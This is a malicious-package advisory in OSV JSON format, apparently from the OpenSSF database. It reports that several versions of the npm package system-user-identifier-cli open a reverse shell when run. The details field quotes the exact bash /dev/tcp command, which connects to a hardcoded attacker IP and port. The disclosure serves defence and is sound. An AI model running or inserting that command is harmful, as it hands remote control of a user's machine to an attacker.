{"id":"MAL-2026-4679","summary":"Malicious code in system-user-identifier-cli (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8)\nindex.js line 13 executes `bash -c \"bash -i \u003e& /dev/tcp/101.43.232.7/7777 0\u003e&1\"` via child_process.exec, opening an interactive reverse shell to the hardcoded attacker-controlled host 101.43.232.7 on TCP port 7777. The shell fires whenever the package's entrypoint is invoked (e.g. `npx system-user-identifier-cli` or require of the module), giving the operator of that endpoint full interactive control of the installer's machine under the user that ran the tool. The package advertises itself as a trivial 'check system user identifier' utility and ships placeholder author metadata ('Your Name'); the reverse shell is undocumented and inconsistent with the stated purpose. There is no benign interpretation of a hardcoded `/dev/tcp/\u003cip\u003e/\u003cport\u003e` bash redirector pointed at an arbitrary public IP.\n","modified":"2026-05-26T06:02:57.397982047Z","published":"2026-05-25T03:45:35Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-05-25T03:45:38Z","import_time":"2026-05-26T05:52:52.148466059Z","id":"IN-MAL-2026-004574","versions":["3.0.0"],"source":"amazon-inspector","sha256":"42d50bd01032d74eb793dda2457b06af253c79003f5b50d0e2979880698ab065"},{"modified_time":"2026-05-25T06:36:21Z","import_time":"2026-05-26T05:52:54.130536263Z","id":"IN-MAL-2026-004591","versions":["7.0.1"],"source":"amazon-inspector","sha256":"4da2798716abd83143a0a2e2b3e5064e2f2a1ac0a63633a70c42881330f52be8"},{"modified_time":"2026-05-25T04:06:25Z","import_time":"2026-05-26T05:52:52.605895842Z","id":"IN-MAL-2026-004578","versions":["6.0.0"],"source":"amazon-inspector","sha256":"4f2b4c5d80f52f89845a4391b512fad3c089995c0594ca911b6d31d569820e8c"},{"modified_time":"2026-05-25T03:45:35Z","import_time":"2026-05-26T05:52:52.030949669Z","id":"IN-MAL-2026-004573","versions":["2.0.0"],"source":"amazon-inspector","sha256":"7f1037c433664bc87feded0df6ed7f751d2ea6c22ec88ef2aa2a039a9e85783e"},{"modified_time":"2026-05-25T03:50:27Z","import_time":"2026-05-26T05:52:52.254069541Z","id":"IN-MAL-2026-004575","versions":["4.0.0"],"source":"amazon-inspector","sha256":"83964970fb7996dfdeaed0e9c48b09642bbee83d429b196d8ef819468c847c08"},{"modified_time":"2026-05-25T06:34:36Z","import_time":"2026-05-26T05:52:54.020037755Z","id":"IN-MAL-2026-004590","versions":["7.0.0"],"source":"amazon-inspector","sha256":"a9a27bcdd265fbec58b0e52a3bd28d83906d5b14a2fd1d7e1147b9ef53398676"},{"modified_time":"2026-05-25T03:56:20Z","import_time":"2026-05-26T05:52:52.489170502Z","id":"IN-MAL-2026-004577","versions":["5.0.0"],"source":"amazon-inspector","sha256":"abcc89501c7e97df9031fc62642ea0e78dde0131d38b85b6b6a995c6e8dec2ec"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/3.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/7.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/6.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/2.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/4.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/7.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/system-user-identifier-cli/v/5.0.0"}],"affected":[{"package":{"name":"system-user-identifier-cli","ecosystem":"npm","purl":"pkg:npm/system-user-identifier-cli"},"versions":["3.0.0","7.0.1","6.0.0","2.0.0","4.0.0","7.0.0","5.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/system-user-identifier-cli/MAL-2026-4679.json","indicators":{"evidence_files":[{"path":"index.js","tlsh":"47f02da80bf8ae79337848e6ad47512319a3f8003112f498e2ee8e5a83c48440608977","sha256":"01358997508aa66db8dc966dbf8341f8d8c000f5b846b7cacfb3491c5821b56e"},{"path":"package.json","tlsh":"c0e068248670097320c66326ac59d425b321ee2b09043c0837ff205c974d63725fbbbc","sha256":"fab5b7ba469ef62cc886cbc5307ee8a0d441f32f101423288a11ae59a3fda5d7"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-ecJgDJbJ49PkP5Yv5xnUXnsU5nqK9OyWk5y0xaYYXpaJ8rH3A1oijGTFHEhpSu0uH1ERkJMpL9gtUpcSr+WArA==","sha1":"ce246c5fc86357d0f683b76e897db17d2e2fb82b"},"filename":"system-user-identifier-cli-3.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}